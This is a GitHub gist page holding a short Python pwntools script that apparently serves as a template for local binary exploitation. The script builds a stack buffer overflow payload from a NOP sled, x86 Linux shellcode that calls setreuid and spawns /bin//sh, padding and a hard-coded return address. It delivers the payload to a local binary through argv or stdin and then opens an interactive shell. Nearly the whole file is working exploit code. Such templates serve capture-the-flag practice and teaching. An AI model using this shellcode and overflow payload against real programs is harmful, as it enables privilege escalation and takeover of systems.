Last active
May 15, 2018 01:37
-
-
Save captainGeech42/a64e3fa7239ea703e32ccda67e6d83fa to your computer and use it in GitHub Desktop.
Sample of some basic pwntools operations
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| # define our binary | |
| binary = "/home/user/testbin" | |
| #### Payloads #### | |
| # read in our payload | |
| with file("payload.bin", "rb") as f: | |
| payload = f.read() | |
| # build a payload | |
| shellcode = "\x31\xC0\x31\xDB\x31\xC9\xB0\x46\x66\xBB\xB5\x36\x66\x89\xD9\xCD\x80\x31\xC0\xB0\x0B\x31\xC9\x31\xD2\x52\x68\x6E\x2F\x73\x68\x68\x2F\x2F\x62\x69\x89\xE3\xCD\x80" | |
| # p32() will encode a dword in little-endian | |
| # there is also p64() if you are doing 64bit binary exploitation | |
| payload = "\x90"*20 + shellcode + "A" * 32 + p32(0xffffd350) | |
| #### Running the program #### | |
| # deliver payload through argv | |
| p = process(executable=binary, argv=[binary, payload]) | |
| # deliver payload through user input | |
| p = process(binary) | |
| p.sendline(payload) | |
| #### Getting a shell #### | |
| p.interactive() | |
| # if you get a message about receiving an EOF, and you press enter and the shell exits, you didn't actually get a shell |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment